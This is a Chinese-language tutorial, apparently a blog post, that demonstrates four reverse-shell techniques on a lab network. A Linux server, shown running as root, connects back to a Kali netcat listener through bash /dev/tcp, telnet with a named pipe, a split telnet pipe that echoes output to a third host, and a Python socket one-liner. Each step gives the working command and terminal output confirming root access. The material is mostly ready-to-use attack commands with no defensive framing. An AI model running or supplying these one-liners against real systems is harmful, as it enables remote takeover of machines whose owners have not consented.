一、通过bash反弹shell
1、 在攻击机上通过nc命令监听2222端口
┌──(kali㉿kali)-[~/Desktop] └─$ nc -lvvp 2222 listening on [any] 2222 ...
2、在服务器上连接攻击机(192.168.137.131)上面监听的2222端口
[root@localhost netcat-0.7.1]# bash -i >& /dev/tcp/192.168.137.131/2222 0>&1
3、连接成功
┌──(kali㉿kali)-[~/Desktop] └─$ nc -lvvp 2222 listening on [any] 2222 ... 192.168.137.130: inverse host lookup failed: Unknown host connect to [192.168.137.131] from (UNKNOWN) [192.168.137.130] 60192 [root@localhost netcat-0.7.1]# id id uid=0(root) gid=0(root) 组=0(root)
二、通过telnet反弹shell
1、在攻击机上通过nc命令监听2222端口
┌──(kali㉿kali)-[~/Desktop] └─$ netcat -lvvp 2222 listening on [any] 2222 ...
2、在服务器上连接攻击机(192.168.137.131)上面监听的2222端口
[root@localhost hids]# mknod a p; telnet 192.168.137.131 2222 0a
3、连接成功
┌──(kali㉿kali)-[~/Desktop] └─$ netcat -lvvp 2222 listening on [any] 2222 ... 192.168.137.130: inverse host lookup failed: Unknown host connect to [192.168.137.131] from (UNKNOWN) [192.168.137.130] 50482 id; uid=0(root) gid=0(root) 组=0(root)
三、通过telnet反弹shell (执行结果在另一台机器上回显)
1、在攻击机(192.168.137.131)上通过nc命令监听2222端口
┌──(kali㉿kali)-[~/Desktop] └─$ netcat -lvvp 2222 listening on [any] 2222 ...
2、在回显机(192.168.137.134)上通过nc命令监听3333端口
┌──(kali㉿kali)-[~/Desktop] └─$ netcat -lvvp 3333 listening on [any] 3333 ...
3、在服务器上连接攻击机(192.168.137.131)上面监听的2222端口,同时通过管道发送到回显机(192.168.137.134)的3333端口上进行回显。
[root@localhost ~]# telnet 192.168.137.131 2222 | /bin/bash | telnet 192.168.137.134 3333 Trying 192.168.137.134... Connected to 192.168.137.134. Escape character is '^]'. /bin/bash:行1: Trying: 未找到命令 /bin/bash:行2: Connected: 未找到命令 /bin/bash:行3: Escape: 未找到命令
4、攻击机(192.168.137.131)连接成功,并输入命令测试。
┌──(kali㉿kali)-[~/Desktop] └─$ nc -lvvp 2222 130 ⨯ listening on [any] 2222 ... 192.168.137.130: inverse host lookup failed: Unknown host connect to [192.168.137.131] from (UNKNOWN) [192.168.137.130] 51208 id
5、查看回显机(192.168.137.134)是否将命令执行结果回显。
┌──(kali㉿kali)-[~/Desktop] └─$ nc -lvvp 3333 listening on [any] 3333 ... 192.168.137.130: inverse host lookup failed: Unknown host connect to [192.168.137.134] from (UNKNOWN) [192.168.137.130] 45286 uid=0(root) gid=0(root) 组=0(root)
四、通过python反弹shell
1、在攻击机上通过nc命令监听2222端口
┌──(kali㉿kali)-[~/Desktop] └─$ netcat -lvvp 2222 listening on [any] 2222 ...
2、在服务器上连接攻击机(192.168.137.131)上面监听的2222端口
[root@localhost ~]# python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.137.131",2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
3、连接成功
┌──(kali㉿kali)-[~/Desktop] └─$ nc -lvvp 2222 130 ⨯ listening on [any] 2222 ... 192.168.137.130: inverse host lookup failed: Unknown host connect to [192.168.137.131] from (UNKNOWN) [192.168.137.130] 51006 sh-4.2# id id uid=0(root) gid=0(root) 组=0(root)
